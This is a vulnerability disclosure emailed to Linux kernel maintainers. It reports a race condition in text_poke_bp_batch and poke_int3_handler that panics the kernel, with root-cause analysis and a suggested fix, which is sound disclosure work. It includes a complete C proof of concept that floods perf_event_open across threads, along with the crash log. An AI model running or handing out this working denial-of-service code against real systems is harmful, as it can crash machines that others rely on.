[Report] Race Condition in text_poke_bp_batch/poke_int3_handler
From: Seohyeon Maeng
Date: Tue Dec 03 2024 - 03:23:26 EST
Dear Maintainers,
This email reports a race condition vulnerability that causes a Denial-of-Service (DoS) in the Linux kernel.
While testing on a system with a 4-core CPU and 4GB of RAM, I observed that executing the attached Proof of Concept (PoC) reliably triggers a kernel panic under the specified conditions.
#define _GNU_SOURCE
#include <linux/perf_event.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sched.h>
#include <pthread.h>
#include <string.h>
#include <sys/ioctl.h>
#define NUM_THREADS 8
static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_fd, int flags){
return syscall(SYS_perf_event_open, hw_event, pid, cpu, group_fd, flags);
}
inline static int _pin_to_cpu(int id) {
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(id, &set);
return sched_setaffinity(getpid(), sizeof(set), &set);
}
void* perf_event_task(void* arg) {
int cpu_id = *((int*)arg);
if (_pin_to_cpu(cpu_id) != 0) {
perror("Failed to set CPU affinity");
pthread_exit(NULL);
}
struct perf_event_attr pe;
memset(&pe, 0, sizeof(pe));
pe.type = PERF_TYPE_SOFTWARE;
pe.size = sizeof(pe);
pe.config = PERF_COUNT_SW_PAGE_FAULTS;
pe.disabled = 0;
pe.exclude_kernel = 1;
pe.exclude_hv = 1;
pe.read_format = PERF_FORMAT_GROUP | PERF_FORMAT_ID | PERF_FORMAT_LOST;
pe.inherit = 1;
pe.inherit_stat = 1;
while (1) {
int group_leader = perf_event_open(&pe, 0, -1, -1, 0);
close(group_leader);
sched_yield();
}
return NULL;
}
int main(void) {
pthread_t threads[NUM_THREADS];
int cpu_ids[NUM_THREADS];
int i;
for (i = 0; i < NUM_THREADS; i++) {
cpu_ids[i] = i % sysconf(_SC_NPROCESSORS_ONLN);
if (pthread_create(&threads[i], NULL, perf_event_task, &cpu_ids[i]) != 0) {
perror("Failed to create thread");
exit(EXIT_FAILURE);
}
}
for (i = 0; i < NUM_THREADS; i++) {
pthread_join(threads[i], NULL);
}
return 0;
}
The PoC demonstrates how this issue can be exploited to cause a DoS scenario.
Running the PoC under the specified conditions reliably triggers a kernel panic over time
~ $ ./a.out
[ 24.727144] Oops: int3: 0000 [#1] PREEMPT SMP NOPTI
[ 24.729582] CPU: 0 UID: 0 PID: 8 Comm: kworker/0:0 Not tainted 6.12.0-rc4-00003-g6fad274f06f0 #1
[ 24.729808] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 24.730160] Workqueue: 0x0 (events)
[ 24.732854] RIP: 0010:__schedule+0x342/0x8f0
[ 24.733886] Code: 48 29 c1 49 01 8c 24 60 04 00 00 4d 85 ed 74 0f 49 01 8d 30 0c 00 00 49 83 85 4
[ 24.734418] RSP: 0018:ffffc9000004be48 EFLAGS: 00000016
[ 24.734462] RAX: 00000005c1bc7f6e RBX: 0000000000000000 RCX: 000000000005704a
[ 24.734507] RDX: 00000005c1c1efb8 RSI: ffff88813bc2d6c0 RDI: 0000000000000000
[ 24.734527] RBP: ffffc9000004bea8 R08: 0000000000000800 R09: 0000000000000001
[ 24.734543] R10: 0000000000000002 R11: 0000000000000157 R12: ffff8881001ad700
[ 24.734557] R13: ffff88813bc2d640 R14: ffff88810013cf40 R15: ffff888100196580
[ 24.734614] FS: 0000000000000000(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 24.734644] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 24.734656] CR2: 00007f089b250658 CR3: 00000001001be000 CR4: 00000000000006f0
[ 24.734743] Call Trace:
[ 24.735508] <TASK>
[ 24.735841] ? die+0x32/0x90
[ 24.735946] ? exc_int3+0x10f/0x120
[ 24.735958] ? asm_exc_int3+0x39/0x40
[ 24.735995] ? __schedule+0x342/0x8f0
[ 24.736011] ? __schedule+0x342/0x8f0
[ 24.736021] ? __schedule+0x203/0x8f0
[ 24.736031] ? queue_delayed_work_on+0x53/0x60
[ 24.736060] schedule+0x22/0xd0
[ 24.736281] worker_thread+0x1a2/0x3b0
[ 24.736304] ? __pfx_worker_thread+0x10/0x10
[ 24.736317] kthread+0xd1/0x100
[ 24.736330] ? __pfx_kthread+0x10/0x10
[ 24.736340] ret_from_fork+0x2f/0x50
[ 24.736353] ? __pfx_kthread+0x10/0x10
[ 24.736365] ret_from_fork_asm+0x1a/0x30
[ 24.736422] </TASK>
[ 24.736462] Modules linked in:
[ 24.736968] ---[ end trace 0000000000000000 ]---
[ 24.737006] Oops: int3: 0000 [#2] PREEMPT SMP NOPTI
[ 24.737169] RIP: 0010:__schedule+0x342/0x8f0
[ 24.737190] Code: 48 29 c1 49 01 8c 24 60 04 00 00 4d 85 ed 74 0f 49 01 8d 30 0c 00 00 49 83 85 4
[ 24.737198] RSP: 0018:ffffc9000004be48 EFLAGS: 00000016
[ 24.737210] RAX: 00000005c1bc7f6e RBX: 0000000000000000 RCX: 000000000005704a
[ 24.737216] RDX: 00000005c1c1efb8 RSI: ffff88813bc2d6c0 RDI: 0000000000000000
[ 24.737221] RBP: ffffc9000004bea8 R08: 0000000000000800 R09: 0000000000000001
[ 24.737226] R10: 0000000000000002 R11: 0000000000000157 R12: ffff8881001ad700
[ 24.737230] R13: ffff88813bc2d640 R14: ffff88810013cf40 R15: ffff888100196580
[ 24.737237] FS: 0000000000000000(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 24.737244] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 24.737249] CR2: 00007f089b250658 CR3: 00000001001be000 CR4: 00000000000006f0
[ 24.737399] Kernel panic - not syncing: Fatal exception in interrupt
[ 30.673416] Shutting down cpus with NMI
[ 30.674903] Kernel Offset: disabled
I have identified a race condition occurring in the text_poke_bp_batch function in the Linux kernel. This issue arises when performance events are repeatedly created and deleted, leading to the activation and deactivation of static branches. The following call stack illustrates the process:
__do_sys_perf_event_open
perf_event_alloc
perf_swevent_init
static_key_slow_inc
jump_label_update
arch_jump_label_transform_apply
text_poke_finish
text_poke_flush
text_poke_bp_batch
Ultimately, this leads to a call to text_poke_bp_batch. The context switching is managed by the __schedule function, specifically in prepare_task_switch, where perf_event_task_sched_out is invoked.
A kernel panic occurs when the following code is executed during live patching. In this scenario, an int3 trap can be triggered.
static inline void perf_event_task_sched_out(struct task_struct *prev,
struct task_struct *next)
{
[...]
if (static_branch_unlikely(&perf_sched_events))
__perf_event_task_sched_out(prev, next);
}
noinstr int poke_int3_handler(struct pt_regs *regs)
{
[...]
desc = try_get_desc(); // [1]
if (!desc)
return 0;
[...]
if (unlikely(desc->nr_entries > 1)) {
tp = __inline_bsearch(ip, desc->vec, desc->nr_entries,
sizeof(struct text_poke_loc),
patch_cmp);
if (!tp)
goto out_put;
} else {
tp = desc->vec;
if (text_poke_addr(tp) != ip)
goto out_put;
}
[...]
out_put:
put_desc();
return ret;
}
During the Interrupt Handler (poke_int3_handler) processing, the patch function may be entered, resulting in an improper reference count (refcount). This can cause the reference count to be incorrectly set, and the bp_desc.vec and bp_desc.nr_entries are reinitialized, leading to a loss of critical information and subsequent failures in handling the int3 trap.
static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries)
{
[...]
lockdep_assert_held(&text_mutex);
bp_desc.vec = tp;
bp_desc.nr_entries = nr_entries;
/*
* Corresponds to the implicit memory barrier in try_get_desc() to
* ensure reading a non-zero refcount provides up to date bp_desc data.
*/
atomic_set_release(&bp_desc.refs, 1); // [2]
[...]
/*
* Remove and wait for refs to be zero.
*/
if (!atomic_dec_and_test(&bp_desc.refs)) // [3]
atomic_cond_read_acquire(&bp_desc.refs, !VAL);
[...]
}
As demonstrated above, bp_desc and its refcount can be modified while poke_int3_handler is executing, leading to unexpected behavior.
Consider a scenario where two CPUs concurrently execute the sequence [1] -> [2] -> [3] -> [1], with overlapping operations on the reference count.
When [3] is executed, the refcount may drop to zero. As a result, when [1] attempts to retrieve the descriptor, it fails, leading to a kernel panic.
To address this issue, I suggest adding a reference count validation mechanism within the interrupt handler to prevent reentrancy. Specifically, the handler should verify the reference count before proceeding and avoid any action if an ongoing operation is detected.
I attempted to address this issue with a patch, but I am not yet fully familiar with the most effective way to resolve it. Nevertheless, I wanted to bring this problem to your attention, as it appears to require further investigation and resolution.
Thank you for your time and consideration in addressing this issue.
Best Regards,
Seohyeon Maeng